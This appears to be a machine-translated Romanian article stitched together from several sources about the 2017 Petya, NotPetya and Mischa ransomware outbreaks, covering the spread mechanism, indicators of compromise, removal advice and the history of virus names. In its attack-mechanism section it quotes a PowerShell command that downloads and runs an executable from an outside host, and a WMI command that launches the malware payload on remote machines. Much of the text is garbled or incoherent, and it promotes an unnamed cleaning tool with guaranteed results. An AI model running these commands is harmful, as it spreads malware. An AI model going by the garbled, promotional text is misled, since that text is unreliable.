Android. Sistem de operare. Multimedia. Rețelele de socializare. Instrumente. Codec-uri. Arte grafice
Ești aici: » »

Virușii Misha ce face. Similar cu Petya, prietena Misha: ce se știe despre noul virus ransomware

Există o nouă epidemie de virus ransomware pe Internet. Malware-ul a blocat practic munca a zeci de companii mari, cerând decriptare hard disk fiecare stație de lucru puțin sub 400 de dolari.

Panica generată de noua epidemie a creat haos informațional: mai întâi, analiștii antivirus au anunțat a doua venire a WannaCry, apoi malware-ul a fost identificat ca un complex de viruși de criptare nou asamblați „Petya” și „Misha”. Pe acest moment este clar că dacă virusul s-a bazat pe Petya, a fost puternic modificat.

Modelul de distribuție este parțial similar cu WannaCry - se folosește o exploatare pentru vulnerabilitatea MS17-010, care a fost îmbunătățită de inginerie socială folosind o vulnerabilitate în MS Word. Infecția are loc după ce un utilizator deschide un atașament de e-mail sau descarcă un fișier care exploatează vulnerabilitatea CVE-2017-0199 publicată în aprilie 2017. Și distribuția către alte computere din rețea este deja asigurată de un întreg set de tehnici:

  • furtul parolelor utilizatorului sau utilizarea sesiunilor active pentru a accesa alte noduri de rețea (este folosit codul utilitar Mimikatz).
  • printr-o vulnerabilitate în SMB (CVE-2017-0144, MS17-010) - folosind același exploit faimos EthernalBlue care a fost folosit cu succes în WannaCry.

Malware-ul folosește furat Conturi să-și copieze corpul în mingile de administrare și să le lanseze folosind utilitarul legal PsExec, care servește la telecomandă calculator.

Dezvoltator al unui program celebru Mimikatz, confirmat că codul modificat este folosit pentru extragerea parolelor.

Codul pentru utilizarea interfeței WMI pentru a rula instalarea a fost publicat și pe blogul Microsoft.

Infectarea prin vectorul SMB utilizează vulnerabilitatea CVE-2017-0144, similară cu tehnica utilizată în WannaCry.

Dar modelul de criptare s-a schimbat semnificativ în comparație cu WannaCry. Virusul, pătrunzând în computer, infectează MBR (master boot record) al sistemului și criptează primele câteva blocuri ale hard disk-ului, inclusiv Master File Table, făcând întregul HDD utilizatori, și nu doar fișiere individuale, așa cum fac de obicei virușii ransomware.

Cu siguranță nu merită să plătiți o răscumpărare extorsionatorilor și nu numai din motive etice: analiștii de viruși au ajuns la concluzia că decriptarea fișierelor după plata unei răscumpări este în principiu imposibilă. Această funcție pur și simplu nu este inclusă în programul malware. De fapt, aceasta nu este o epidemie de ransomware, ci o epidemie a unui virus ștergător care distruge datele.

Potrivit rapoartelor presei din Rusia din cele mai mari probleme s-au ciocnit la corporația Rosneft, site-urile principale ale corporației și site-ul Bashneft au fost dezactivate pentru o lungă perioadă de timp.

Au fost înregistrate infecții masive în Franța, Spania, Rusia și țările CSI. În Ucraina, zeci de organizații guvernamentale și comerciale au fost afectate de virus.

Cine are nevoie?

Deoarece mecanismul de recuperare nu a fost inclus în cod, există trei opțiuni posibile pentru motivarea atacatorilor. Fie au vrut să deghizeze distrugerea țintită a datelor specifice ale cuiva ca pe o epidemie în masă, fie au vrut să facă bani fără să intenționeze inițial să restaureze ceva. Opțiunea cea mai puțin probabilă este vandalismul cibernetic. Un virus este un produs serios și ar fi mai înțelept să cheltuiți efortul de a-l crea pe ceva care aduce bani. Vandalii erau obișnuiți în anii 1990, când era la modă să spargă sistemele pentru faimă, dar acum sunt extrem de rari.

Drept urmare, principalii beneficiari ai epidemilor din ultimele 2 luni au fost, se pare, grupul The Shadow Brokers, care a distribuit exploitul EthernalBlue. Estorcatorii înșiși au adunat sume relativ mici de bani, cu câteva ordine de mărime mai mici decât valoarea pagubelor cauzate de epidemie. Epidemiile au devenit o reclamă excelentă pentru The Shadow Brokers, care susțin că sunt gata să vândă informații despre alte exploit-uri din arhiva NSA. La urma urmei, EthernalBlue este doar un exploit din zecile furate de la Serviciul Secret în august 2016.

Mecanism de atac

Un atacator poate trimite fișiere sau link-uri către ele (în stadiul inițial al epidemiei acestea erau fișierele Petya.apx, myguy.exe, myguy.xls, Order-[any date].doc), prin care o stație de lucru care rulează Windows OS este infectat. De exemplu, la deschiderea fișierului Order-[any date].doc, serverul 84.200.16.242 este contactat pe portul 80 și xls este descărcat:

powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\10807.exe");" (PID: [ID proces], Context suplimentar: (System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\[număr aleatoriu].exe") ;)

Malware-ul încearcă apoi să se conecteze la serverele 111.90.139.247:80 și COFFEINOFFICE.XYZ:80, care sunt posibil servere de comandă și control.

Indicatorii de compromis sunt prezența fișierelor:

C:\Windows\perfc.dat
C:\myguy.xls.hta

După ce a fost repartizat gazdei, altele mașini Windowsîn rețea și răspândit prin vulnerabilitățile descrise în MS17-010 (aceleași cele folosite de WannaCry) pe porturile tcp:135, tcp:139, tcp:445, tcp:1024-1035.

Distribuția poate avea loc și prin executarea comenzii:

WMI la distanță, „apel de proces creați „C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\perfc.dat\" #1"


Diagrama de răspândire a infecției este preluată de pe blog.kryptoslogic.com

Cum să evitați infecția?

french-cooking.com:80
84.200.16.242:80
111.90.139.247:80
COFFEINOFFICE.XYZ:80

Petya.apx, myguy.exe, myguy.xls, Comanda-[orice dată].doc

3. Instalați patch-uri

4. Configurați IPS pentru a bloca exploit-urile pentru MS17-010

5. Pentru a proteja gazdele care nu au fost încă infectate, puteți crea un fișier c:\windows\perfc fără extensie. Astfel de noduri nu sunt infectate.

În urmă cu câteva luni, noi și alți specialiști în securitate IT am descoperit un nou malware - Petya (Win32.Trojan-Ransom.Petya.A). În sensul clasic, nu era un criptator; virusul pur și simplu a blocat accesul la anumite tipuri de fișiere și a cerut o răscumpărare. Virusul s-a modificat intrare de boot pe hard disk, a repornit forțat computerul și a afișat un mesaj că „datele sunt criptate - irosește-ți banii pentru decriptare”. În întregime schema standard viruși ransomware, cu excepția faptului că fișierele NU au fost de fapt criptate. Cele mai populare antivirusuri au început să identifice și să elimine Win32.Trojan-Ransom.Petya.A la câteva săptămâni după apariția sa. În plus, există instrucțiuni pentru îndepărtarea manuală. De ce credem că Petya nu este un ransomware clasic? Acest virus face modificări în înregistrarea de pornire principală și împiedică încărcarea sistemului de operare și, de asemenea, criptează tabelul de fișiere master. Nu criptează fișierele în sine.

Cu toate acestea, un virus mai sofisticat a apărut în urmă cu câteva săptămâni Mischa, scris aparent de aceiași escroci. Acest virus CRIPTĂ fișierele și vă solicită să plătiți 500 USD - 875 USD pentru decriptare (în versiuni diferite 1,5 – 1,8 bitcoin). Instrucțiunile pentru „decriptare” și plata pentru aceasta sunt stocate în fișierele YOUR_FILES_ARE_ENCRYPTED.HTML și YOUR_FILES_ARE_ENCRYPTED.TXT.

Virusul Mischa – conținutul fișierului YOUR_FILES_ARE_ENCRYPTED.HTML

Acum, de fapt, hackerii infectează computerele utilizatorilor cu două programe malware: Petya și Mischa. Primul are nevoie de drepturi de administrator pe sistem. Adică, dacă un utilizator refuză să acorde drepturi de administrator Petya sau șterge manual acest malware, Mischa se implică. Acest virus nu necesită drepturi de administrator, este un criptator clasic și de fapt criptează fișierele folosind algoritmul puternic AES și fără a face modificări în Master Boot Record și tabelul de fișiere de pe hard diskul victimei.

Mischa malware nu doar criptează tipuri standard fișiere (videoclipuri, imagini, prezentări, documente), dar și fișiere .exe. Virusul nu afectează doar directoarele \Windows, \$Recycle.Bin, \Microsoft, \ Mozilla Firefox,\Operă,\ Internet Explorer, \Temp, \Local, \LocalLow și \Chrome.

Infecția are loc în principal prin e-mail, unde se primește o scrisoare cu un fișier atașat – programul de instalare a virusului. Acesta poate fi criptat sub o scrisoare de la Serviciul Fiscal, de la contabilul dumneavoastră, ca chitanțe atașate și chitanțe pentru cumpărături etc. Acordați atenție extensiilor de fișiere din astfel de litere - dacă este un fișier executabil (.exe), atunci cu o mare probabilitate poate fi un container cu virusul Petya\Mischa. Și dacă modificarea malware-ului este recentă, este posibil ca antivirusul dvs. să nu răspundă.

Actualizare 30.06.2017: 27 iunie, o versiune modificată a virusului Petya (Petya.A) au atacat masiv utilizatorii din Ucraina. Efectul acestui atac a fost enorm, iar prejudiciul economic nu a fost încă calculat. Într-o singură zi, munca a zeci de bănci, lanțuri de retail, agenții guvernamentale și întreprinderi cu diferite forme de proprietate a fost paralizată. Virusul s-a răspândit în principal printr-o vulnerabilitate din sistemul ucrainean de raportare contabilă MeDoc cu cele mai recente actualizare automata a acestui software. În plus, virusul a afectat țări precum Rusia, Spania, Marea Britanie, Franța și Lituania.

Eliminați virusul Petya și Mischa folosind un agent de curățare automat

O metodă extrem de eficientă de lucru cu malware în general și ransomware în special. Utilizarea unui complex de protecție dovedit garantează detectarea minuțioasă a oricăror componente virale, a acestora îndepărtarea completă cu un singur clic. Notă, despre care vorbim despre două procese diferite: dezinstalarea infecției și restaurarea fișierelor de pe computer. Cu toate acestea, amenințarea trebuie cu siguranță eliminată, deoarece există informații despre introducerea altor troieni de computer care o folosesc.

  1. . După pornirea software-ului, faceți clic pe butonul Porniți scanarea computerului(Începe scanarea).
  2. Software-ul instalat va furniza un raport despre amenințările detectate în timpul scanării. Pentru a elimina toate amenințările detectate, selectați opțiunea Repara amenințări(Eliminați amenințările). Malware-ul în cauză va fi complet eliminat.

Restabiliți accesul la fișierele criptate

După cum sa menționat, ransomware-ul Mischa blochează fișierele folosind un algoritm de criptare puternic, astfel încât datele criptate să nu poată fi restaurate cu un val de baghetă magică - fără a plăti o sumă de răscumpărare nemaivăzută (uneori ajungând până la 1.000 USD). Dar unele metode pot fi cu adevărat salvatoare care vă vor ajuta să recuperați date importante. Mai jos vă puteți familiariza cu ele.

Program de recuperare automată a fișierelor (decriptor)

Se cunoaște o circumstanță foarte neobișnuită. Această infecție se șterge fișiere sursăîn formă necriptată. Procesul de criptare în scopuri de extorcare vizează astfel copii ale acestora. Aceasta oferă o oportunitate pentru așa ceva software cum să restaurați obiectele șterse, chiar dacă fiabilitatea înlăturării lor este garantată. Este foarte recomandat să recurgeți la procedura de recuperare a fișierelor; eficacitatea acesteia este fără îndoială.

Copii umbră ale volumelor

Abordarea se bazează pe procedura Windows Rezervă copie fișiere, care se repetă la fiecare punct de recuperare. Conditii importante de munca aceasta metoda: Funcția „Restaurare sistem” trebuie să fie activată înainte de infectare. Cu toate acestea, orice modificări aduse fișierului după punctul de restaurare nu vor apărea în versiunea restaurată a fișierului.

Backup

Aceasta este cea mai bună dintre toate metodele fără răscumpărare. Dacă procedura de copiere de rezervă a datelor pe un server extern a fost folosită înainte de atacul ransomware asupra computerului dvs., pentru a restaura fișierele criptate trebuie pur și simplu să intrați în interfața corespunzătoare, să selectați fișierele necesare și să lansați mecanismul de recuperare a datelor din backup. Înainte de a efectua operația, trebuie să vă asigurați că ransomware-ul este complet eliminat.

Verificați posibila prezență a componentelor reziduale ale ransomware-ului Petya și Mischa

Curățarea manuală riscă să lipsească bucăți individuale de ransomware care ar putea scăpa de eliminare ca obiecte ascunse ale sistemului de operare sau elemente de registry. Pentru a elimina riscul reținerii parțiale a elementelor rău intenționate individuale, scanați-vă computerul utilizând un pachet software de securitate de încredere, specializat în software rău intenționat.

O scurtă excursie în istoria denumirii malware.

La marcaje

Petya.A sigla virusului

Pe 27 iunie, cel puțin 80 de companii rusești și ucrainene au fost atacate de virusul Petya.A. Programul a blocat informații de pe computerele departamentelor și întreprinderilor și, la fel ca binecunoscutul virus ransomware, a cerut bitcoini de la utilizatori.

Programele rău intenționate sunt de obicei denumite de către angajații companiilor antivirus. Excepție fac criptatorii, ransomware-urile, distrugătorii și hoții de identitate, care, pe lângă infecțiile computerizate, provoacă epidemii media - hype crescut în mass-media și discuții active în rețea.

Cu toate acestea, virusul Petya.A este un reprezentant al unei noi generații. Numele cu care se prezintă face parte strategie de marketing dezvoltatorii și-au propus să crească recunoașterea și popularitatea în creștere pe piața darknet.

Fenomen subcultural

În acele vremuri când erau puține computere și nu toate erau conectate între ele, deja existau programe cu autopropagare (nu încă viruși). Una dintre primele dintre acestea a fost , care l-a salutat în glumă pe utilizator și s-a oferit să-l prindă și să-l ștergă. Următorul a fost Cookie Monster, care a cerut „să-i dea o prăjitură” introducând cuvântul „cookie”.

Malware-ul timpuriu avea și simțul umorului, deși nu era întotdeauna în numele lor. Astfel, Richard Scrant, conceput pentru computerul Apple-2, i-a citit victimei o poezie o dată la 50 de porniri de computer, iar numele virușilor, adesea ascunși în cod și neafișați, se refereau la glume și cuvinte subculturale comune în rândul tocilor. din acea vreme. Ele ar putea fi asociate cu nume de trupe de metal, literatură populară și jocuri de rol de masă.

La sfârșitul secolului al XX-lea, creatorii de viruși nu s-au ascuns prea mult - în plus, adesea, atunci când un program a scăpat de sub control, ei au încercat să ia parte la eliminarea daunelor cauzate acestuia. Așa a fost cazul celui pakistanez și distructiv, creat de viitorul co-fondator al incubatorului de afaceri Y-Combinator.

Unul dintre virușii ruși menționați de Evgeniy Kaspersky în cartea sa din 1992 „Computer Viruses in MS-DOS” a demonstrat, de asemenea, abilități poetice. Programul Condom-1581 a arătat, din când în când, victimei un program dedicat problemelor de înfundare a oceanelor lumii cu deșeuri umane.

Geografie și calendar

În 1987, virusul Ierusalim, cunoscut și sub numele de virusul israelian, a fost numit după locul unde a fost descoperit pentru prima dată și nume alternativ Vinerea neagră s-a datorat faptului că ar activa și șterge fișierele executabile dacă ziua de 13 a lunii cade vineri.

Virusul Michelangelo, care a provocat panică în mass-media în primăvara anului 1992, a fost denumit și după principiul calendarului. Apoi, John McAfee, mai târziu celebru pentru crearea unuia dintre cele mai intruzive antivirusuri, în timpul unei conferințe de securitate cibernetică de la Sydney, le-a spus jurnaliștilor și publicului: „Dacă porniți un sistem infectat pe 6 martie, toate datele de pe hard disk vor fi corupte”. Ce legătură are Michelangelo cu asta? 6 martie a fost ziua de naștere a artistului italian. Cu toate acestea, ororile pe care le-a prezis McAfee au ajuns să fie extrem de exagerate.

Funcționalitate

Capacitățile virusului și specificul său servesc adesea ca bază pentru nume. În 1990, unul dintre primii viruși polimorfi a fost numit Chameleon, iar acesta, care are capacități extinse de a-și ascunde prezența (și, prin urmare, aparține categoriei virușilor ascunși), a fost numit Frodo, făcându-se aluzie la eroul „Stăpânul Inele” și Inelul care se ascunde de ochii celorlalți. Și, de exemplu, virusul OneHalf din 1994 și-a primit numele datorită faptului că a arătat agresivitate doar infectând jumătate din discul dispozitivului atacat.

Titluri de servicii

Majoritatea virușilor au fost denumiți de mult timp în laboratoare, unde sunt analizați în părți de către analiști.

De obicei, acestea sunt nume de serie plictisitoare și nume generale de „familie” care descriu categoria virusului, ce sisteme atacă și ce face cu ele (cum ar fi Win32.HLLP.DeTroie). Cu toate acestea, uneori, când indicii lăsate de dezvoltatori sunt dezvăluite în codul programului, virușii capătă puțină personalitate. Așa au apărut, de exemplu, virușii MyDoom și KooKoo.

Cu toate acestea, această regulă nu funcționează întotdeauna - de exemplu, virusul Stuxnet, care a oprit centrifugele de îmbogățire a uraniului în Iran, nu a fost numit Myrtus, deși acest cuvânt ("mirt") din cod era aproape un indiciu direct asupra participării israelienilor. serviciile de informaţii în dezvoltarea sa. În acest caz, a câștigat numele care devenise deja cunoscut publicului larg, atribuit virusului în primele etape ale descoperirii sale.

Sarcini

Se întâmplă adesea ca virușii care necesită multă atenție și efort pentru a studia să primească nume frumoase de la companii de antivirus, care sunt mai ușor de spus și notat - asta s-a întâmplat cu Octombrie Roșie, corespondență diplomatică și date care ar putea afecta relațiile internaționale, precum și cu IceFog, spionaj industrial pe scară largă.

Extensie de fișier

Un alt mod popular de denumire este prin extensia pe care virusul o atribuie fișierelor infectate. Astfel, unul dintre virușii „militari”, Duqu, a fost numit așa nu din cauza contelui Dooku din Star Wars, ci din cauza prefixului ~DQ, care marca fișierele pe care le crease.

Așa și-a luat numele senzaționalul în această primăvară. Virusul WannaCry, care marchează datele pe care le criptează cu extensia .wncry.

Nume anterior Vreau virus Decrypt0r, nu a prins - suna mai rău și avea ortografii diferite. Nu toată lumea s-a deranjat să pună „0” drept „o”.

„Ați devenit o victimă a virusului ransomware Petya”

Exact așa se prezintă cel mai discutat malware astăzi după ce a finalizat criptarea fișierelor de pe computerul atacat. Virusul Petya A. nu are doar un nume recunoscut, ci și un logo sub forma unui craniu de pirat și oase încrucișate și o întreagă promovare de marketing. Descoperit împreună cu fratele său „Misha”, virusul a atras atenția analiștilor tocmai din această cauză.

Dintr-un fenomen subcultural, trecând printr-o perioadă în care acest tip de „hacking” necesita cunoștințe tehnice destul de serioase, virușii s-au transformat într-o armă a unui cyber-gop-stop. Acum trebuie să joace după regulile pieței - și cine primește mai multă atenție aduce profituri mari dezvoltatorilor lor.

Marți, 27 iunie, ucraineană și companiile rusești a raportat un atac masiv de virus: computerele de la întreprinderi au afișat un mesaj de răscumpărare. Mi-am dat seama cine a suferit încă o dată din cauza hackerilor și cum să te protejezi de furtul de date importante.

Petya, e suficient

Sectorul energetic a fost primul atacat: companiile ucrainene Ukrenergo și Kyivenergo s-au plâns de virus. Atacatorii și-au paralizat sistemele informatice, dar acest lucru nu a afectat stabilitatea centralelor electrice.

Ucrainenii au început să publice consecințele infecției online: judecând după numeroase imagini, computerele au fost atacate de un virus ransomware. Pe ecranul dispozitivelor afectate a apărut un mesaj care afirmă că toate datele au fost criptate și că proprietarii de dispozitive trebuiau să plătească o răscumpărare de 300 USD în Bitcoin. Totuși, hackerii nu au spus ce s-ar întâmpla cu informațiile în caz de inacțiune și nici măcar nu au setat un cronometru până când datele au fost distruse, așa cum a fost cazul atacului virusului WannaCry.

Banca Națională a Ucrainei (BNU) a raportat că activitatea mai multor bănci a fost parțial paralizată din cauza virusului. Potrivit presei ucrainene, atacul a afectat birourile Oschadbank, Ukrsotsbank, Ukrgasbank și PrivatBank.

au fost infectate retele de calculatoare„Ukrtelecom”, aeroportul „Borispol”, „Ukrposhta”, „ E-mail nou”, „Kievvodokanal” și metroul Kiev. În plus, virusul a lovit operatorii de telefonie mobilă ucraineană - Kyivstar, Vodafone și Lifecell.

Ulterior, presa ucraineană a clarificat că vorbim despre malware Petya.A. Este distribuit conform schemei obișnuite pentru hackeri: victimelor li se trimit e-mailuri de phishing de la manechin care le cer să deschidă un link atașat. După aceasta, virusul pătrunde în computer, criptează fișierele și solicită o răscumpărare pentru decriptarea acestora.

Hackerii au indicat numărul portofelului lor Bitcoin în care ar trebui să fie transferați banii. Judecând după informațiile despre tranzacție, victimele au transferat deja 1,2 bitcoini (mai mult de 168 de mii de ruble).

Potrivit experților pe securitatea informatiei de la compania Group-IB, peste 80 de companii au fost afectate în urma atacului. Șeful laboratorului lor criminalistic a remarcat că virusul nu are legătură cu WannaCry. Pentru a remedia problema, el a sfătuit să închideți porturile TCP 1024–1035, 135 și 445.

Cine este vinovat

Ea s-a grăbit să presupună că atacul a fost organizat de pe teritoriul Rusiei sau Donbass, dar nu a oferit nicio dovadă. Ministrul Infrastructurii al Ucrainei a văzut indiciu în cuvântul „virus” și a scris pe Facebook că „nu este o coincidență că se termină în RUS”, adăugând o emoticon care face cu ochiul la presupunerea sa.

Între timp, el susține că atacul nu are nicio legătură cu „malware” existent, cunoscut sub numele de Petya și Mischa. Experții în securitate susțin că noul val a afectat nu numai companiile ucrainene și rusești, ci și întreprinderile din alte țări.

Cu toate acestea, interfața actualului „malware” seamănă cu binecunoscutul virus Petya, care a fost distribuit prin legături de phishing cu câțiva ani în urmă. La sfârșitul lunii decembrie, un hacker necunoscut responsabil pentru crearea ransomware-ului Petya și Mischa a început să trimită e-mailuri infectate cu un virus atașat numit GoldenEye, care era identic cu versiunile anterioare ale ransomware-ului.

Atașamentul la scrisoarea obișnuită, pe care angajații departamentului de resurse umane o primeau adesea, conținea informații despre candidatul fals. Într-unul dintre fișiere se putea găsi într-adevăr un CV, iar în următorul - un program de instalare a virușilor. Atunci principalele ținte ale atacatorului au fost companiile din Germania. Pe parcursul a 24 de ore, peste 160 de angajați ai companiei germane au căzut în capcană.

Nu s-a putut identifica hackerul, dar este evident că este fan Bond. Programele Petya și Mischa sunt numele sateliților ruși „Petya” și „Misha” din filmul „Golden Eye”, care în complot erau arme electromagnetice.

Versiunea originală a lui Petya a început să fie distribuită activ în aprilie 2016. Ea s-a deghizat cu pricepere pe computere și s-a prefăcut că este programe juridice solicitând drepturi de administrator extinse. După activare, programul s-a comportat extrem de agresiv: a stabilit un termen strict pentru plata răscumpărării, cerând 1,3 bitcoini, iar după termen, a dublat compensația bănească.

Adevărat, atunci unul dintre utilizatorii Twitter a găsit rapid punctele slabe ale ransomware-ului și a creat un program simplu, care în șapte secunde a generat o cheie care vă permite să deblocați computerul și să decriptați toate datele fără nicio consecință.

Nu pentru prima dată

La mijlocul lunii mai, computerele din întreaga lume au fost atacate de un virus ransomware similar, WannaCrypt0r 2.0, cunoscut și sub numele de WannaCry. În doar câteva ore, a paralizat munca a sute de mii de muncitori Dispozitive Windowsîn peste 70 de țări. Printre victime s-au numărat forțele de securitate ruse, bănci și operatorii de telefonie mobilă. Odată ajuns pe computerul victimei, virusul a criptat hard disk-ul și a cerut atacatorilor să trimită 300 de dolari în bitcoin. Trei zile au fost alocate pentru reflecție, după care suma a fost dublată, iar după o săptămână fișierele au fost criptate pentru totdeauna.

Cu toate acestea, victimele nu s-au grăbit să plătească răscumpărarea și creatorii malware-ului

Drepturi de autor pentru ilustrație PA Legendă imagine Potrivit experților, lupta cu noul ransomware este mai dificilă decât WannaCry

Pe 27 iunie, ransomware-ul a blocat computere și fișiere criptate la zeci de companii din întreaga lume.

Se raportează că companiile ucrainene au suferit cel mai mult - virusul a infectat computerele marilor companii, agențiile guvernamentale și infrastructura.

Virusul cere 300 USD în Bitcoin de la victime pentru a decripta fișierele.

Serviciul rusesc BBC răspunde la principalele întrebări despre noua amenințare.

Cine a fost rănit?

Răspândirea virusului a început în Ucraina. Au fost afectate aeroportul Boryspil, unele divizii regionale ale Ukrenergo, lanțuri de magazine, bănci, mass-media și companii de telecomunicații. Calculatoarele din guvernul ucrainean au scăzut și ele.

În continuare, a venit rândul companiilor din Rusia: Rosneft, Bashneft, Mondelez International, Mars, Nivea și altele au devenit și ele victime ale virusului.

Cum funcționează virusul?

Experții nu au ajuns încă la un consens cu privire la originea noului virus. Group-IB și Positive Technologies îl văd ca pe o variantă a virusului Petya din 2016.

„Aceasta este extorcare software folosește atât metode de hacking, cât și utilități și utilități standard administrarea sistemului”, comentează Elmar Nabigaev, șeful departamentului de răspuns la amenințările de securitate a informațiilor la Positive Technologies. - Toate acestea garantează de mare viteză răspândirea în rețea și masivitatea epidemiei în ansamblu (dacă cel puțin una calculator personal). Rezultatul este inoperabilitatea completă a computerului și criptarea datelor.”

Compania românească Bitdefender vede mai multe în comun cu virusul GoldenEye, în care Petya este combinat cu un alt malware numit Misha. Avantajul celui din urmă este că nu necesită drepturi de administrator de la viitoarea victimă pentru a cripta fișierele, ci le extrage independent.

Brian Cambell de la Fujitsu și o serie de alți experți cred că virus nou folosește un program EternalBlue modificat, furat de la Agenția de Securitate Națională a SUA.

După publicarea acestui program de către hackerii The Shadow Brokers în aprilie 2017, virusul ransomware WannaCry creat pe baza sa s-a răspândit în întreaga lume.

Folosind vulnerabilitățile Windows, acest program permite virusului să se răspândească pe computere rețeaua corporativă. Originalul Petya a fost trimis prin e-mail deghizat în CV și nu putea infecta decât computerul unde era deschis CV-ul.

Kaspersky Lab a declarat pentru Interfax că virusul ransomware nu aparține unor familii cunoscute anterior de software rău intenționat.

„Produsele software Kaspersky Lab detectează acest malware ca UDS:DangeroundObject.Multi.Generic”, a menționat Vyacheslav Zakorzhevsky, șeful departamentului de cercetare antivirus la Kaspersky Lab.

În general, dacă numiți noul virus prin numele său rusesc, trebuie să aveți în vedere că în aparență seamănă mai mult cu monstrul lui Frankenstein, deoarece este asamblat din mai multe programe rău intenționate. Se știe cu siguranță că virusul s-a născut pe 18 iunie 2017.

Legendă imagine Virusul cere 300 USD pentru a decripta fișierele și a debloca computerul.

Mai cool decât WannaCry?

WannaCry a avut nevoie de doar câteva zile în mai 2017 pentru a deveni cel mai mare atac cibernetic de acest gen din istorie. Va depăși noul virus ransomware recentul său predecesor?

În mai puțin de o zi, atacatorii au primit de la victimele lor 2,1 bitcoini - aproximativ 5 mii de dolari. WannaCry a colectat 7 bitcoini în aceeași perioadă.

În același timp, potrivit lui Elmar Nabigaev de la Positive Technologies, este mai dificil să lupți cu noul ransomware.

„Pe lângă exploatarea [vulnerabilitatea Windows], această amenințare se răspândește și prin conturi sisteme de operare, furate folosind instrumente speciale de hacker”, a remarcat expertul.

Cum să lupți împotriva virusului?

Ca măsură preventivă, experții recomandă instalarea la timp a actualizărilor pentru sistemele de operare și verificarea fișierelor primite prin e-mail.

Administratorii avansați sunt sfătuiți să dezactiveze temporar protocolul de transfer al rețelei Server Message Block (SMB).

Dacă computerele dumneavoastră sunt infectate, în niciun caz nu trebuie să plătiți atacatorii. Nu există nicio garanție că, odată ce primesc plata, vor decripta fișierele în loc să solicite mai mult.

Rămâne doar să așteptăm programul de decriptare: în cazul WannaCry, a fost nevoie de o săptămână pentru al crea lui Adrien Guinier, specialist de la compania franceză Quarkslab.

Primul ransomware SIDA (PC Cyborg) a fost scris de biologul Joseph Popp în 1989. Ea a ascuns directoare și fișiere criptate, cerând plata de 189 USD pentru" Reînnoirea licenței" la un cont în Panama. Popp și-a distribuit creația folosind dischete prin poștă obișnuită, făcând un total de aproximativ 20 de mii.yachexpedierile. Popp a fost reținut în timp ce încerca să încaseze un cec, dar a evitat procesul - în 1991 a fost declarat nebun.

Titlu: Fier
Acțiune